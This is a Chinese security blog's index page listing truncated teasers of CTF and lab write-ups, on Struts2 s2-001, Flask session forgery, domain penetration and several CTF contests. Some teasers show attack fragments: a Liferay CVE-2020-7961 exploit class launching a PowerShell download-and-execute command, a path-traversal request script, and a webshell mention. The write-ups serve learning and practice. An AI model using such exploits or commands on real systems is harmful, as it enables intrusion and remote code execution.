Java-Web之s2-001与CommonsCollections(转)

2020-09-18 20:09:00 16
代码审计 - 反序列化 - java

文章首发于合天:https://mp.weixin.qq.com/s/JbBtp1yEOXPahLG8eX9F7g 本文源自我个人入坑Java-Web安全的一点小经验,献给那些看得懂java代码但不知道从哪里入手代审的师傅们:) Struts2之s2-001 环境配置 说说环境配置的问题,大多数人对漏洞复现的恐惧感还是来自于环境的配置,也许配了大半天的环境后只花几分钟就把漏洞复现了,感觉有点...

文章首发于合天:https://mp.weixin.qq.com/s/JbBtp1yEOXPahLG8eX9F7g...

阅读全文>>

2020年「羊城杯」网络安全大赛

2020-09-12 18:09:00 98
ctf - 羊城杯

easycon 简单题,连上马儿后发现目录下有个bbb的txt文件,解码base64后的图片就是flag了。 BlackCat view-source:http://183.129.189.60:10022/Hei_Mao_Jing_Chang.mp3 拉到最底下有源码: ```php if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST...

easycon 简单题,连上马儿后发现目录下有个bbb的txt文件,解码base64后的图片就是flag了。 Bl...

阅读全文>>

2020第四届强网杯

2020-08-24 23:08:00 106
ctf - qwb

upload wireshark导出对象后会有一个图片,根据文件名知道是steghide隐写,密码123456。 Funhash ```php <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { ...

upload wireshark导出对象后会有一个图片,根据文件名知道是steghide隐写,密码123456。 ...

阅读全文>>

ciscn初赛

2020-08-21 18:08:00 136
ctf - wp - ciscn

easyphp 源码给出: ```php <?php //题目环境:php:7.4.8-apache $pid = pcntl_fork(); if ($pid == -1) { die('could not fork'); }else if ($pid){ $r=pcntl_wait($status); ...

easyphp 源码给出: ```php <?php //题目环境:php:7.4.8-apache...

阅读全文>>

浅谈flask与ctf那些事(转)

2020-08-21 11:08:00 80
ctf - flask

文章首发于合天:https://mp.weixin.qq.com/s/EZGLMte09GvqT6YFl4L8CA 最近跑了培训写了点flask的session伪造,没能用上,刚好整理了一下先前的资料把flask三种考过的点拿出来写写文章。 debug pin 本地先起一个开启debug模式的服务: ```python -- coding: utf-8 -- from flask impor...

文章首发于合天:https://mp.weixin.qq.com/s/EZGLMte09GvqT6YFl4L8CA...

阅读全文>>

WMCTF2020

2020-08-04 17:08:00 160
ctf - wmctf

SU的师傅们太顶了,全程被带飞,贡献度为0 XD 其他的题目环境下了+自己太菜了来不及复现。 web_checkin(v1) php <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } v1版本是出题人忘记改...

SU的师傅们太顶了,全程被带飞,贡献度为0 XD 其他的题目环境下了+自己太菜了来不及复现。 web_checki...

阅读全文>>

3k ctf

2020-07-27 19:07:00 167
ctf - 3kctf

不愧是国外的比赛,就没一道会的。。。 carthagods 这题先是给了源码: php <?php if(@$_GET[*REDACTED*]){ $file=$_GET[*REDACTED*]; $f=file_get_contents('thecarthagods/'.$file); if (!preg_match("/<...

不愧是国外的比赛,就没一道会的。。。 carthagods 这题先是给了源码: php <?php ...

阅读全文>>

DASCTF 七月

2020-07-26 01:07:00 108
wp - dasctf

好久没发文了,水水 web1 前缀固定,发现../被过滤了,但这道题只是过滤了开头的../,搞不明白这么出题有什么意思。。 ```python import time import requests import base64 file = "hhhm/../../../../../../../../flag" file = base64.b64encode(file.encode()) ...

好久没发文了,水水 web1 前缀固定,发现../被过滤了,但这道题只是过滤了开头的../,搞不明白这么出题有什么...

阅读全文>>

cs与简单域渗透

2020-07-03 20:07:00 141
cs - 域渗透

前言 上回遇到了域渗透题,自己没事找了个红日的靶机来学学域渗透的东西。 红日的域渗透靶机,有三台机,配了两个网段: kali nat win7 vm2,nat win2008 vm2 win2003 vm2 nat为192.168.248.0/24 vm2为192.168.52.0/24 貌似环境问题,win7的靶机需要清理右下角通知区域图标: reg delete "HKEY_CUR...

前言 上回遇到了域渗透题,自己没事找了个红日的靶机来学学域渗透的东西。 红日的域渗透靶机,有三台机,配了两个网段:...

阅读全文>>

DozerCTF

2020-06-15 14:06:00 288
ctf - wp - DozerCTF

简单的域渗透1 一血,感觉是非预期?前面直接用powercat弹shell,后面怎么都弹不到了? Liferay的cve:CVE-2020-7961 ```java public class Exploit { static { try { String[] cmd = {"cmd.exe", "/c", "powershell IEX (New-Object System.Net.Webc...

简单的域渗透1 一血,感觉是非预期?前面直接用powercat弹shell,后面怎么都弹不到了? Liferay的...

阅读全文>>


CopyRight © 2019 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号